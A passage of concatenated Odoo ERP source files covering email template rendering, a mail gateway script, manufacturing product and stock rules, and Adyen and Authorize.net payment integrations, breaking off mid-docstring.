# short: 1/5/16, 10:20 PM | 5/01/16 22:20
if env.context.get('use_babel'):
# Formatting available here : http://babel.pocoo.org/en/latest/dates.html#date-fields
from babel.dates import format_datetime
return format_datetime(ts, format or 'medium', locale=env.context.get("lang") or 'en_US')
if format:
return pycompat.text_type(ts.strftime(format))
else:
lang = env.context.get("lang")
langs = env['res.lang']
if lang:
langs = env['res.lang'].search([("code", "=", lang)])
format_date = langs.date_format or '%B-%d-%Y'
format_time = langs.time_format or '%I-%M %p'
fdate = pycompat.text_type(ts.strftime(format_date))
ftime = pycompat.text_type(ts.strftime(format_time))
return u"%s %s%s" % (fdate, ftime, (u' (%s)' % tz) if tz else u'')
def format_amount(env, amount, currency):
fmt = "%.{0}f".format(currency.decimal_places)
lang = env['res.lang']._lang_get(env.context.get('lang') or 'en_US')
formatted_amount = lang.format(fmt, currency.round(amount), grouping=True, monetary=True)\
.replace(r' ', u'\N{NO-BREAK SPACE}').replace(r'-', u'-\N{ZERO WIDTH NO-BREAK SPACE}')
pre = post = u''
if currency.position == 'before':
pre = u'{symbol}\N{NO-BREAK SPACE}'.format(symbol=currency.symbol or '')
else:
post = u'\N{NO-BREAK SPACE}{symbol}'.format(symbol=currency.symbol or '')
return u'{pre}{0}{post}'.format(formatted_amount, pre=pre, post=post)
try:
# We use a jinja2 sandboxed environment to render mako templates.
# Note that the rendering does not cover all the mako syntax, in particular
# arbitrary Python statements are not accepted, and not all expressions are
# allowed: only "public" attributes (not starting with '_') of objects may
# be accessed.
# This is done on purpose: it prevents incidental or malicious execution of
# Python code that may break the security of the server.
from jinja2.sandbox import SandboxedEnvironment
mako_template_env = SandboxedEnvironment(
block_start_string="<%",
block_end_string="%>",
variable_start_string="${",
variable_end_string="}",
comment_start_string="<%doc>",
comment_end_string="</%doc>",
line_statement_prefix="%",
line_comment_prefix="##",
trim_blocks=True, # do not output newline after blocks
autoescape=True, # XML/HTML automatic escaping
)
mako_template_env.globals.update({
'str': str,
'quote': urls.url_quote,
'urlencode': urls.url_encode,
'datetime': datetime,
'len': len,
'abs': abs,
'min': min,
'max': max,
'sum': sum,
'filter': filter,
'reduce': functools.reduce,
'map': map,
'round': round,
# dateutil.relativedelta is an old-style class and cannot be directly
# instanciated wihtin a jinja2 expression, so a lambda "proxy" is
# is needed, apparently.
'relativedelta': lambda *a, **kw : relativedelta.relativedelta(*a, **kw),
})
mako_safe_template_env = copy.copy(mako_template_env)
mako_safe_template_env.autoescape = False
except ImportError:
_logger.warning("jinja2 not available, templating features will not work!")
class MailTemplate(models.Model):
"Templates for sending email"
_name = "mail.template"
_description = 'Email Templates'
_order = 'name'
@api.model
def default_get(self, fields):
res = super(MailTemplate, self).default_get(fields)
if res.get('model'):
res['model_id'] = self.env['ir.model']._get(res.pop('model')).id
return res
name = fields.Char('Name')
model_id = fields.Many2one('ir.model', 'Applies to', help="The type of document this template can be used with")
model = fields.Char('Related Document Model', related='model_id.model', index=True, store=True, readonly=True)
lang = fields.Char('Language',
help="Optional translation language (ISO code) to select when sending out an email. "
"If not set, the english version will be used. "
"This should usually be a placeholder expression "
"that provides the appropriate language, e.g. "
"${object.partner_id.lang}.",
placeholder="${object.partner_id.lang}")
user_signature = fields.Boolean('Add Signature',
help="If checked, the user's signature will be appended to the text version "
"of the message")
subject = fields.Char('Subject', translate=True, help="Subject (placeholders may be used here)")
email_from = fields.Char('From',
help="Sender address (placeholders may be used here). If not set, the default "
"value will be the author's email alias if configured, or email address.")
use_default_to = fields.Boolean(
'Default recipients',
help="Default recipients of the record:\n"
"- partner (using id on a partner or the partner_id field) OR\n"
"- email (using email_from or email field)")
email_to = fields.Char('To (Emails)', help="Comma-separated recipient addresses (placeholders may be used here)")
partner_to = fields.Char('To (Partners)', oldname='email_recipients',
help="Comma-separated ids of recipient partners (placeholders may be used here)")
email_cc = fields.Char('Cc', help="Carbon copy recipients (placeholders may be used here)")
reply_to = fields.Char('Reply-To', help="Preferred response address (placeholders may be used here)")
mail_server_id = fields.Many2one('ir.mail_server', 'Outgoing Mail Server', readonly=False,
help="Optional preferred server for outgoing mails. If not set, the highest "
"priority one will be used.")
body_html = fields.Html('Body', translate=True, sanitize=False)
report_name = fields.Char('Report Filename', translate=True,
help="Name to use for the generated report file (may contain placeholders)\n"
"The extension can be omitted and will then come from the report type.")
report_template = fields.Many2one('ir.actions.report', 'Optional report to print and attach')
ref_ir_act_window = fields.Many2one('ir.actions.act_window', 'Sidebar action', readonly=True, copy=False,
help="Sidebar action to make this template available on records "
"of the related document model")
attachment_ids = fields.Many2many('ir.attachment', 'email_template_attachment_rel', 'email_template_id',
'attachment_id', 'Attachments',
help="You may attach files to this template, to be added to all "
"emails created from this template")
auto_delete = fields.Boolean('Auto Delete', default=True, help="Permanently delete this email after sending it, to save space")
# Fake fields used to implement the placeholder assistant
model_object_field = fields.Many2one('ir.model.fields', string="Field",
help="Select target field from the related document model.\n"
"If it is a relationship field you will be able to select "
"a target field at the destination of the relationship.")
sub_object = fields.Many2one('ir.model', 'Sub-model', readonly=True,
help="When a relationship field is selected as first field, "
"this field shows the document model the relationship goes to.")
sub_model_object_field = fields.Many2one('ir.model.fields', 'Sub-field',
help="When a relationship field is selected as first field, "
"this field lets you select the target field within the "
"destination document model (sub-model).")
null_value = fields.Char('Default Value', help="Optional value to use if the target field is empty")
copyvalue = fields.Char('Placeholder Expression', help="Final placeholder expression, to be copy-pasted in the desired template field.")
scheduled_date = fields.Char('Scheduled Date', help="If set, the queue manager will send the email after the date. If not set, the email will be send as soon as possible. Jinja2 placeholders may be used.")
@api.onchange('model_id')
def onchange_model_id(self):
# TDE CLEANME: should'nt it be a stored related ?
if self.model_id:
self.model = self.model_id.model
else:
self.model = False
def build_expression(self, field_name, sub_field_name, null_value):
"""Returns a placeholder expression for use in a template field,
based on the values provided in the placeholder assistant.
:param field_name: main field name
:param sub_field_name: sub field name (M2O)
:param null_value: default value if the target value is empty
:return: final placeholder expression """
expression = ''
if field_name:
expression = "${object." + field_name
if sub_field_name:
expression += "." + sub_field_name
if null_value:
expression += " or '''%s'''" % null_value
expression += "}"
return expression
@api.onchange('model_object_field', 'sub_model_object_field', 'null_value')
def onchange_sub_model_object_value_field(self):
if self.model_object_field:
if self.model_object_field.ttype in ['many2one', 'one2many', 'many2many']:
model = self.env['ir.model']._get(self.model_object_field.relation)
if model:
self.sub_object = model.id
self.copyvalue = self.build_expression(self.model_object_field.name, self.sub_model_object_field and self.sub_model_object_field.name or False, self.null_value or False)
else:
self.sub_object = False
self.sub_model_object_field = False
self.copyvalue = self.build_expression(self.model_object_field.name, False, self.null_value or False)
else:
self.sub_object = False
self.copyvalue = False
self.sub_model_object_field = False
self.null_value = False
@api.multi
def unlink(self):
self.unlink_action()
return super(MailTemplate, self).unlink()
@api.multi
@api.returns('self', lambda value: value.id)
def copy(self, default=None):
default = dict(default or {},
name=_("%s (copy)") % self.name)
return super(MailTemplate, self).copy(default=default)
@api.multi
def unlink_action(self):
for template in self:
if template.ref_ir_act_window:
template.ref_ir_act_window.unlink()
return True
@api.multi
def create_action(self):
ActWindow = self.env['ir.actions.act_window']
view = self.env.ref('mail.email_compose_message_wizard_form')
for template in self:
button_name = _('Send Mail (%s)') % template.name
action = ActWindow.create({
'name': button_name,
'type': 'ir.actions.act_window',
'res_model': 'mail.compose.message',
'src_model': template.model_id.model,
'view_type': 'form',
'context': "{'default_composition_mode': 'mass_mail', 'default_template_id' : %d, 'default_use_template': True}" % (template.id),
'view_mode': 'form,tree',
'view_id': view.id,
'target': 'new',
'binding_model_id': template.model_id.id,
})
template.write({'ref_ir_act_window': action.id})
return True
# ----------------------------------------
# RENDERING
# ----------------------------------------
@api.model
def render_post_process(self, html):
html = self.env['mail.thread']._replace_local_links(html)
return html
@api.model
def _render_template(self, template_txt, model, res_ids, post_process=False):
""" Render the given template text, replace mako expressions ``${expr}``
with the result of evaluating these expressions with an evaluation
context containing:
- ``user``: Model of the current user
- ``object``: record of the document record this mail is related to
- ``context``: the context passed to the mail composition wizard
:param str template_txt: the template text to render
:param str model: model name of the document record this mail is related to.
:param int res_ids: list of ids of document records those mails are related to.
"""
multi_mode = True
if isinstance(res_ids, pycompat.integer_types):
multi_mode = False
res_ids = [res_ids]
results = dict.fromkeys(res_ids, u"")
# try to load the template
try:
mako_env = mako_safe_template_env if self.env.context.get('safe') else mako_template_env
template = mako_env.from_string(tools.ustr(template_txt))
except Exception:
_logger.info("Failed to load template %r", template_txt, exc_info=True)
return multi_mode and results or results[res_ids[0]]
# prepare template variables
records = self.env[model].browse(it for it in res_ids if it) # filter to avoid browsing [None]
res_to_rec = dict.fromkeys(res_ids, None)
for record in records:
res_to_rec[record.id] = record
variables = {
'format_date': lambda date, format=False, context=self._context: format_date(self.env, date, format),
'format_tz': lambda dt, tz=False, format=False, context=self._context: format_tz(self.env, dt, tz, format),
'format_amount': lambda amount, currency, context=self._context: format_amount(self.env, amount, currency),
'user': self.env.user,
'ctx': self._context, # context kw would clash with mako internals
}
for res_id, record in res_to_rec.items():
variables['object'] = record
try:
render_result = template.render(variables)
except Exception:
_logger.info("Failed to render template %r using values %r" % (template, variables), exc_info=True)
raise UserError(_("Failed to render template %r using values %r")% (template, variables))
if render_result == u"False":
render_result = u""
results[res_id] = render_result
if post_process:
for res_id, result in results.items():
results[res_id] = self.render_post_process(result)
return multi_mode and results or results[res_ids[0]]
@api.multi
def get_email_template(self, res_ids):
multi_mode = True
if isinstance(res_ids, pycompat.integer_types):
res_ids = [res_ids]
multi_mode = False
if res_ids is None:
res_ids = [None]
results = dict.fromkeys(res_ids, False)
if not self.ids:
return results
self.ensure_one()
langs = self._render_template(self.lang, self.model, res_ids)
for res_id, lang in langs.items():
if lang:
template = self.with_context(lang=lang)
else:
template = self
results[res_id] = template
return multi_mode and results or results[res_ids[0]]
@api.multi
def generate_recipients(self, results, res_ids):
"""Generates the recipients of the template. Default values can ben generated
instead of the template values if requested by template or context.
Emails (email_to, email_cc) can be transformed into partners if requested
in the context. """
self.ensure_one()
if self.use_default_to or self._context.get('tpl_force_default_to'):
default_recipients = self.env['mail.thread'].message_get_default_recipients(res_model=self.model, res_ids=res_ids)
for res_id, recipients in default_recipients.items():
results[res_id].pop('partner_to', None)
results[res_id].update(recipients)
records_company = None
if self._context.get('tpl_partners_only') and self.model and results and 'company_id' in self.env[self.model]._fields:
records = self.env[self.model].browse(results.keys()).read(['company_id'])
records_company = {rec['id']: (rec['company_id'][0] if rec['company_id'] else None) for rec in records}
for res_id, values in results.items():
partner_ids = values.get('partner_ids', list())
if self._context.get('tpl_partners_only'):
mails = tools.email_split(values.pop('email_to', '')) + tools.email_split(values.pop('email_cc', ''))
Partner = self.env['res.partner']
if records_company:
Partner = Partner.with_context(default_company_id=records_company[res_id])
for mail in mails:
partner_id = Partner.find_or_create(mail)
partner_ids.append(partner_id)
partner_to = values.pop('partner_to', '')
if partner_to:
# placeholders could generate '', 3, 2 due to some empty field values
tpl_partner_ids = [int(pid) for pid in partner_to.split(',') if pid]
partner_ids += self.env['res.partner'].sudo().browse(tpl_partner_ids).exists().ids
results[res_id]['partner_ids'] = partner_ids
return results
@api.multi
def generate_email(self, res_ids, fields=None):
"""Generates an email from the template for given the given model based on
records given by res_ids.
:param res_id: id of the record to use for rendering the template (model
is taken from template definition)
:returns: a dict containing all relevant fields for creating a new
mail.mail entry, with one extra key ``attachments``, in the
format [(report_name, data)] where data is base64 encoded.
"""
self.ensure_one()
multi_mode = True
if isinstance(res_ids, pycompat.integer_types):
res_ids = [res_ids]
multi_mode = False
if fields is None:
fields = ['subject', 'body_html', 'email_from', 'email_to', 'partner_to', 'email_cc', 'reply_to', 'scheduled_date']
res_ids_to_templates = self.get_email_template(res_ids)
# templates: res_id -> template; template -> res_ids
templates_to_res_ids = {}
for res_id, template in res_ids_to_templates.items():
templates_to_res_ids.setdefault(template, []).append(res_id)
results = dict()
for template, template_res_ids in templates_to_res_ids.items():
Template = self.env['mail.template']
# generate fields value for all res_ids linked to the current template
if template.lang:
Template = Template.with_context(lang=template._context.get('lang'))
for field in fields:
Template = Template.with_context(safe=field in {'subject'})
generated_field_values = Template._render_template(
getattr(template, field), template.model, template_res_ids,
post_process=(field == 'body_html'))
for res_id, field_value in generated_field_values.items():
results.setdefault(res_id, dict())[field] = field_value
# compute recipients
if any(field in fields for field in ['email_to', 'partner_to', 'email_cc']):
results = template.generate_recipients(results, template_res_ids)
# update values for all res_ids
for res_id in template_res_ids:
values = results[res_id]
# body: add user signature, sanitize
if 'body_html' in fields and template.user_signature:
signature = self.env.user.signature
if signature:
values['body_html'] = tools.append_content_to_html(values['body_html'], signature, plaintext=False)
if values.get('body_html'):
values['body'] = tools.html_sanitize(values['body_html'])
# technical settings
values.update(
mail_server_id=template.mail_server_id.id or False,
auto_delete=template.auto_delete,
model=template.model,
res_id=res_id or False,
attachment_ids=[attach.id for attach in template.attachment_ids],
)
# Add report in attachments: generate once for all template_res_ids
if template.report_template:
for res_id in template_res_ids:
attachments = []
report_name = self._render_template(template.report_name, template.model, res_id)
report = template.report_template
report_service = report.report_name
if report.report_type in ['qweb-html', 'qweb-pdf']:
result, format = report.render_qweb_pdf([res_id])
else:
res = report.render([res_id])
if not res:
raise UserError(_('Unsupported report type %s found.') % report.report_type)
result, format = res
# TODO in trunk, change return format to binary to match message_post expected format
result = base64.b64encode(result)
if not report_name:
report_name = 'report.' + report_service
ext = "." + format
if not report_name.endswith(ext):
report_name += ext
attachments.append((report_name, result))
results[res_id]['attachments'] = attachments
return multi_mode and results or results[res_ids[0]]
@api.multi
def send_mail(self, res_id, force_send=False, raise_exception=False, email_values=None, notif_layout=False):
""" Generates a new mail.mail. Template is rendered on record given by
res_id and model coming from template.
:param int res_id: id of the record to render the template
:param bool force_send: send email immediately; otherwise use the mail
queue (recommended);
:param dict email_values: update generated mail with those values to further
customize the mail;
:param str notif_layout: optional notification layout to encapsulate the
generated email;
:returns: id of the mail.mail that was created """
self.ensure_one()
Mail = self.env['mail.mail']
Attachment = self.env['ir.attachment'] # TDE FIXME: should remove dfeault_type from context
# create a mail_mail based on values, without attachments
values = self.generate_email(res_id)
values['recipient_ids'] = [(4, pid) for pid in values.get('partner_ids', list())]
values.update(email_values or {})
attachment_ids = values.pop('attachment_ids', [])
attachments = values.pop('attachments', [])
# add a protection against void email_from
if 'email_from' in values and not values.get('email_from'):
values.pop('email_from')
# encapsulate body
if notif_layout and values['body_html']:
try:
template = self.env.ref(notif_layout, raise_if_not_found=True)
except ValueError:
_logger.warning('QWeb template %s not found when sending template %s. Sending without layouting.' % (notif_layout, self.name))
else:
record = self.env[self.model].browse(res_id)
template_ctx = {
'message': self.env['mail.message'].sudo().new(dict(body=values['body_html'], record_name=record.display_name)),
'model_description': self.env['ir.model']._get(record._name).display_name,
'company': 'company_id' in record and record['company_id'] or self.env.user.company_id,
'record': record,
}
body = template.render(template_ctx, engine='ir.qweb', minimal_qcontext=True)
values['body_html'] = self.env['mail.thread']._replace_local_links(body)
mail = Mail.create(values)
# manage attachments
for attachment in attachments:
attachment_data = {
'name': attachment[0],
'datas_fname': attachment[0],
'datas': attachment[1],
'type': 'binary',
'res_model': 'mail.message',
'res_id': mail.mail_message_id.id,
}
attachment_ids.append(Attachment.create(attachment_data).id)
if attachment_ids:
values['attachment_ids'] = [(6, 0, attachment_ids)]
mail.write({'attachment_ids': [(6, 0, attachment_ids)]})
if force_send:
mail.send(raise_exception=raise_exception)
return mail.id # TDE CLEANME: return mail + api.returns ?
```
#### File: static/scripts/odoo-mailgate.py
```python
import optparse
import sys
import traceback
import xmlrpclib
def main():
op = optparse.OptionParser(usage='usage: %prog [options]', version='%prog v1.2')
op.add_option("-d", "--database", dest="database", help="Odoo database name (default: %default)", default='odoo')
op.add_option("-u", "--userid", dest="userid", help="Odoo user id to connect with (default: %default)", default=1, type=int)
op.add_option("-p", "--password", dest="password", help="Odoo user password (default: %default)", default='admin')
op.add_option("--host", dest="host", help="Odoo host (default: %default)", default='localhost')
op.add_option("--port", dest="port", help="Odoo port (default: %default)", default=8069, type=int)
(o, args) = op.parse_args()
try:
msg = sys.stdin.read()
models = xmlrpclib.ServerProxy('http://%s:%s/xmlrpc/2/object' % (o.host, o.port), allow_none=True)
models.execute_kw(o.database, o.userid, o.password, 'mail.thread', 'message_process', [False, xmlrpclib.Binary(msg)], {})
except xmlrpclib.Fault as e:
# reformat xmlrpc faults to print a readable traceback
err = "xmlrpclib.Fault: %s\n%s" % (e.faultCode, e.faultString)
sys.exit(err)
except Exception as e:
traceback.print_exc(None, sys.stderr)
sys.exit(2)
if __name__ == '__main__':
main()
```
#### File: addons/mail/validation.py
```python
import logging
import os
from lxml import etree
from odoo.loglevels import ustr
from odoo.tools import misc, view_validation
_logger = logging.getLogger(__name__)
_activity_validator = None
@view_validation.validate('activity')
def schema_activity(arch):
""" Check the activity view against its schema
:type arch: etree._Element
"""
global _activity_validator
if _activity_validator is None:
with misc.file_open(os.path.join('mail', 'views', 'activity.rng')) as f:
_activity_validator = etree.RelaxNG(etree.parse(f))
if _activity_validator.validate(arch):
return True
for error in _activity_validator.error_log:
_logger.error(ustr(error))
return False
```
#### File: mail/wizard/base_partner_merge.py
```python
from odoo import api, models, _
class MergePartnerAutomatic(models.TransientModel):
_inherit = 'base.partner.merge.automatic.wizard'
@api.multi
def _log_merge_operation(self, src_partners, dst_partner):
super(MergePartnerAutomatic, self)._log_merge_operation(src_partners, dst_partner)
dst_partner.message_post(body='%s %s' % (_("Merged with the following partners:"), ", ".join('%s <%s> (ID %s)' % (p.name, p.email or 'n/a', p.id) for p in src_partners)))
```
#### File: mrp/models/product.py
```python
from datetime import timedelta
from odoo import api, fields, models
from odoo.tools.float_utils import float_round
class ProductTemplate(models.Model):
_inherit = "product.template"
bom_line_ids = fields.One2many('mrp.bom.line', 'product_tmpl_id', 'BoM Components')
bom_ids = fields.One2many('mrp.bom', 'product_tmpl_id', 'Bill of Materials')
bom_count = fields.Integer('# Bill of Material', compute='_compute_bom_count')
used_in_bom_count = fields.Integer('# of BoM Where is Used', compute='_compute_used_in_bom_count')
mrp_product_qty = fields.Float('Manufactured', compute='_compute_mrp_product_qty')
produce_delay = fields.Float(
'Manufacturing Lead Time', default=0.0,
help="Average lead time in days to manufacture this product. In the case of multi-level BOM, the manufacturing lead times of the components will be added.")
def _compute_bom_count(self):
for product in self:
product.bom_count = self.env['mrp.bom'].search_count([('product_tmpl_id', '=', product.id)])
@api.multi
def _compute_used_in_bom_count(self):
for template in self:
template.used_in_bom_count = self.env['mrp.bom'].search_count(
[('bom_line_ids.product_id', 'in', template.product_variant_ids.ids)])
@api.multi
def action_used_in_bom(self):
self.ensure_one()
action = self.env.ref('mrp.mrp_bom_form_action').read()[0]
action['domain'] = [('bom_line_ids.product_id', 'in', self.product_variant_ids.ids)]
return action
@api.one
def _compute_mrp_product_qty(self):
self.mrp_product_qty = float_round(sum(self.mapped('product_variant_ids').mapped('mrp_product_qty')), precision_rounding=self.uom_id.rounding)
@api.multi
def action_view_mos(self):
action = self.env.ref('mrp.mrp_production_report').read()[0]
action['domain'] = [('state', '=', 'done'), ('product_tmpl_id', 'in', self.ids)]
action['context'] = {
'search_default_last_year_mo_order': 1,
'search_default_status': 1, 'search_default_scheduled_month': 1,
'graph_measure': 'product_uom_qty',
}
return action
class ProductProduct(models.Model):
_inherit = "product.product"
variant_bom_ids = fields.One2many('mrp.bom', 'product_id', 'BOM Product Variants')
bom_line_ids = fields.One2many('mrp.bom.line', 'product_id', 'BoM Components')
bom_count = fields.Integer('# Bill of Material', compute='_compute_bom_count')
used_in_bom_count = fields.Integer('# BoM Where Used', compute='_compute_used_in_bom_count')
mrp_product_qty = fields.Float('Manufactured', compute='_compute_mrp_product_qty')
def _compute_bom_count(self):
for product in self:
product.bom_count = self.env['mrp.bom'].search_count(['|', ('product_id', '=', product.id), '&', ('product_id', '=', False), ('product_tmpl_id', '=', product.product_tmpl_id.id)])
@api.multi
def _compute_used_in_bom_count(self):
for product in self:
product.used_in_bom_count = self.env['mrp.bom'].search_count([('bom_line_ids.product_id', '=', product.id)])
@api.multi
def action_used_in_bom(self):
self.ensure_one()
action = self.env.ref('mrp.mrp_bom_form_action').read()[0]
action['domain'] = [('bom_line_ids.product_id', '=', self.id)]
return action
def _compute_mrp_product_qty(self):
date_from = fields.Datetime.to_string(fields.datetime.now() - timedelta(days=365))
#TODO: state = done?
domain = [('state', '=', 'done'), ('product_id', 'in', self.ids), ('date_planned_start', '>', date_from)]
read_group_res = self.env['mrp.production'].read_group(domain, ['product_id', 'product_uom_qty'], ['product_id'])
mapped_data = dict([(data['product_id'][0], data['product_uom_qty']) for data in read_group_res])
for product in self:
product.mrp_product_qty = float_round(mapped_data.get(product.id, 0), precision_rounding=product.uom_id.rounding)
@api.multi
def action_view_bom(self):
action = self.env.ref('mrp.product_open_bom').read()[0]
template_ids = self.mapped('product_tmpl_id').ids
# bom specific to this variant or global to template
action['context'] = {
'default_product_tmpl_id': template_ids[0],
'default_product_id': self.ids[0],
}
action['domain'] = ['|', ('product_id', 'in', self.ids), '&', ('product_id', '=', False), ('product_tmpl_id', 'in', template_ids)]
return action
@api.multi
def action_view_mos(self):
action = self.env.ref('mrp.mrp_production_report').read()[0]
action['domain'] = [('state', '=', 'done'), ('product_id', 'in', self.ids)]
action['context'] = {
'search_default_last_year_mo_order': 1,
'search_default_status': 1, 'search_default_scheduled_month': 1,
'graph_measure': 'product_uom_qty',
}
return action
```
#### File: mrp/models/stock_rule.py
```python
from dateutil.relativedelta import relativedelta
from odoo import api, fields, models, _
from odoo.exceptions import UserError
from odoo.osv import expression
class StockRule(models.Model):
_inherit = 'stock.rule'
action = fields.Selection(selection_add=[('manufacture', 'Manufacture')])
def _get_message_dict(self):
message_dict = super(StockRule, self)._get_message_dict()
source, destination, operation = self._get_message_values()
manufacture_message = _('When products are needed in <b>%s</b>, <br/> a manufacturing order is created to fulfill the need.') % (destination)
if self.location_src_id:
manufacture_message += _(' <br/><br/> The components will be taken from <b>%s</b>.') % (source)
message_dict.update({
'manufacture': manufacture_message
})
return message_dict
@api.onchange('action')
def _onchange_action_operation(self):
domain = {'picking_type_id': []}
if self.action == 'manufacture':
domain = {'picking_type_id': [('code', '=', 'mrp_operation')]}
return {'domain': domain}
@api.multi
def _run_manufacture(self, product_id, product_qty, product_uom, location_id, name, origin, values):
Production = self.env['mrp.production']
ProductionSudo = Production.sudo().with_context(force_company=values['company_id'].id)
bom = self._get_matching_bom(product_id, values)
if not bom:
msg = _('There is no Bill of Material found for the product %s. Please define a Bill of Material for this product.') % (product_id.display_name,)
raise UserError(msg)
# create the MO as SUPERUSER because the current user may not have the rights to do it (mto product launched by a sale for example)
production = ProductionSudo.create(self._prepare_mo_vals(product_id, product_qty, product_uom, location_id, name, origin, values, bom))
origin_production = values.get('move_dest_ids') and values['move_dest_ids'][0].raw_material_production_id or False
orderpoint = values.get('orderpoint_id')
if orderpoint:
production.message_post_with_view('mail.message_origin_link',
values={'self': production, 'origin': orderpoint},
subtype_id=self.env.ref('mail.mt_note').id)
if origin_production:
production.message_post_with_view('mail.message_origin_link',
values={'self': production, 'origin': origin_production},
subtype_id=self.env.ref('mail.mt_note').id)
return True
@api.multi
def _get_matching_bom(self, product_id, values):
if values.get('bom_id', False):
return values['bom_id']
return self.env['mrp.bom'].with_context(
company_id=values['company_id'].id, force_company=values['company_id'].id
)._bom_find(product=product_id, picking_type=self.picking_type_id) # TDE FIXME: context bullshit
def _prepare_mo_vals(self, product_id, product_qty, product_uom, location_id, name, origin, values, bom):
return {
'origin': origin,
'product_id': product_id.id,
'product_qty': product_qty,
'product_uom_id': product_uom.id,
'location_src_id': self.location_src_id.id or self.picking_type_id.default_location_src_id.id or location_id.id,
'location_dest_id': location_id.id,
'bom_id': bom.id,
'date_planned_start': fields.Datetime.to_string(self._get_date_planned(product_id, values)),
'date_planned_finished': values['date_planned'],
'procurement_group_id': False,
'propagate': self.propagate,
'picking_type_id': self.picking_type_id.id or values['warehouse_id'].manu_type_id.id,
'company_id': values['company_id'].id,
'move_dest_ids': values.get('move_dest_ids') and [(4, x.id) for x in values['move_dest_ids']] or False,
}
def _get_date_planned(self, product_id, values):
format_date_planned = fields.Datetime.from_string(values['date_planned'])
date_planned = format_date_planned - relativedelta(days=product_id.produce_delay or 0.0)
date_planned = date_planned - relativedelta(days=values['company_id'].manufacturing_lead)
return date_planned
def _push_prepare_move_copy_values(self, move_to_copy, new_date):
new_move_vals = super(StockRule, self)._push_prepare_move_copy_values(move_to_copy, new_date)
new_move_vals['production_id'] = False
return new_move_vals
class ProcurementGroup(models.Model):
_inherit = 'procurement.group'
@api.model
def _get_moves_to_assign_domain(self):
domain = super(ProcurementGroup, self)._get_moves_to_assign_domain()
domain = expression.AND([domain, [('production_id', '=', False)]])
return domain
```
#### File: payment_adyen/controllers/main.py
```python
import json
import logging
import pprint
import werkzeug
from odoo import http
from odoo.http import request
_logger = logging.getLogger(__name__)
class AdyenController(http.Controller):
_return_url = '/payment/adyen/return/'
@http.route([
'/payment/adyen/return',
], type='http', auth='none', csrf=False)
def adyen_return(self, **post):
_logger.info('Beginning Adyen form_feedback with post data %s', pprint.pformat(post)) # debug
if post.get('authResult') not in ['CANCELLED']:
request.env['payment.transaction'].sudo().form_feedback(post, 'adyen')
return werkzeug.utils.redirect('/payment/process')
@http.route([
'/payment/adyen/notification',
], type='http', auth='none', methods=['POST'], csrf=False)
def adyen_notification(self, **post):
tx = post.get('merchantReference') and request.env['payment.transaction'].sudo().search([('reference', 'in', [post.get('merchantReference')])], limit=1)
if post.get('eventCode') in ['AUTHORISATION'] and tx:
states = (post.get('merchantReference'), post.get('success'), tx.state)
if (post.get('success') == 'true' and tx.state == 'done') or (post.get('success') == 'false' and tx.state in ['cancel', 'error']):
_logger.info('Notification from Adyen for the reference %s: received %s, state is %s', states)
else:
_logger.warning('Notification from Adyen for the reference %s: received %s but state is %s', states)
return '[accepted]'
```
#### File: payment_authorize/models/authorize_request.py
```python
import io
import requests
from lxml import etree, objectify
from xml.etree import ElementTree as ET
from uuid import uuid4
import pprint
import logging
from odoo.addons.payment.models.payment_acquirer import _partner_split_name
from odoo.exceptions import ValidationError, UserError
from odoo import _
_logger = logging.getLogger(__name__)
XMLNS = 'AnetApi/xml/v1/schema/AnetApiSchema.xsd'
def strip_ns(xml, ns):
"""Strip the provided name from tag names.
:param str xml: xml document
:param str ns: namespace to strip
:rtype: etree._Element
:return: the parsed xml string with the namespace prefix removed
"""
it = ET.iterparse(io.BytesIO(xml))
ns_prefix = '{%s}' % XMLNS
for _, el in it:
if el.tag.startswith(ns_prefix):
el.tag = el.tag[len(ns_prefix):] # strip all Auth.net namespaces
return it.root
def error_check(elem):
"""Check if the response sent by Authorize.net contains an error.
Errors can be a failure to try the transaction (in that case, the transasctionResponse
is empty, and the meaningful error message will be in message/code) or a failure to process
the transaction (in that case, the message/code content will be generic and the actual error
message is in transactionResponse/errors/error/errorText).
:param etree._Element elem: the root element of the response that will be parsed
:rtype: tuple (bool, str)
:return: tuple containnig a boolean indicating if the response should be considered
as an error and the most meaningful error message found in it.
"""
result_code = elem.find('messages/resultCode')
msg = 'No meaningful error message found, please check logs or the Authorize.net backend'
has_error = result_code is not None and result_code.text == 'Error'
if has_error:
# accumulate the most meangingful error
error = elem.find('transactionResponse/errors/error')
error = error if error is not None else elem.find('messages/message')
if error is not None:
code = error[0].text
text = error[1].text
msg = '%s: %s' % (code, text)
return (has_error, msg)
class AuthorizeAPI():
"""Authorize.net Gateway API integration.
This class allows contacting the Authorize.net API with simple operation
requests. It implements a *very limited* subset of the complete API
(http://developer.authorize.net/api/reference); namely:
- Customer Profile/Payment Profile creation
- Transaction authorization/capture/voiding
"""
AUTH_ERROR_STATUS = 3
def __init__(self, acquirer):
"""Initiate the environment with the acquirer data.
:param record acquirer: payment.acquirer account that will be contacted
"""
if acquirer.environment == 'test':
self.url = 'https://apitest.authorize.net/xml/v1/request.api'
else:
self.url = 'https://api.authorize.net/xml/v1/request.api'
self.name = acquirer.authorize_login
self.transaction_key = acquirer.authorize_transaction_key
def _authorize_request(self, data):
"""Encode, send and process the request to the Authorize.net API.
Encodes the xml data and process the response. Note that only a basic
processing is done at this level (namespace cleanup, basic error management).
:param etree._Element data: etree data to process
"""
logged_data = data
data = etree.tostring(data, encoding='utf-8')
for node_to_remove in ['//merchantAuthentication', '//creditCard']:
for node in logged_data.xpath(node_to_remove):
node.getparent().remove(node)
logged_data = str(etree.tostring(logged_data, encoding='utf-8', pretty_print=True)).replace(r'\n', '\n')
_logger.info('_authorize_request: Sending values to URL %s, values:\n%s', self.url, logged_data)
r = requests.post(self.url, data=data, headers={'Content-Type': 'text/xml'})
r.raise_for_status()
response = strip_ns(r.content, XMLNS)
logged_data = etree.XML(r.content)
logged_data = str(etree.tostring(logged_data, encoding='utf-8', pretty_print=True)).replace(r'\n', '\n')
_logger.info('_authorize_request: Values received\n%s', logged_data)
return response
def _base_tree(self, requestType):
"""Create a basic tree containing authentication information.
Create a etree Element of type requestType and appends the Authorize.net
credentials (they are always required).
:param str requestType: the type of request to send to Authorize.net
See http://developer.authorize.net/api/reference
for available types.
:return: basic etree Element of the requested type
containing credentials information
:rtype: etree._Element
"""
root = etree.Element(requestType, xmlns=XMLNS)
auth = etree.SubElement(root, "merchantAuthentication")
etree.SubElement(auth, "name").text = self.name
etree.SubElement(auth, "transactionKey").text = self.transaction_key
return root
# Customer profiles
def create_customer_profile(self, partner, cardnumber, expiration_date, card_code):
"""Create a payment and customer profile in the Authorize.net backend.
Creates a customer profile for the partner/credit card combination and links
a corresponding payment profile to it. Note that a single partner in the Odoo
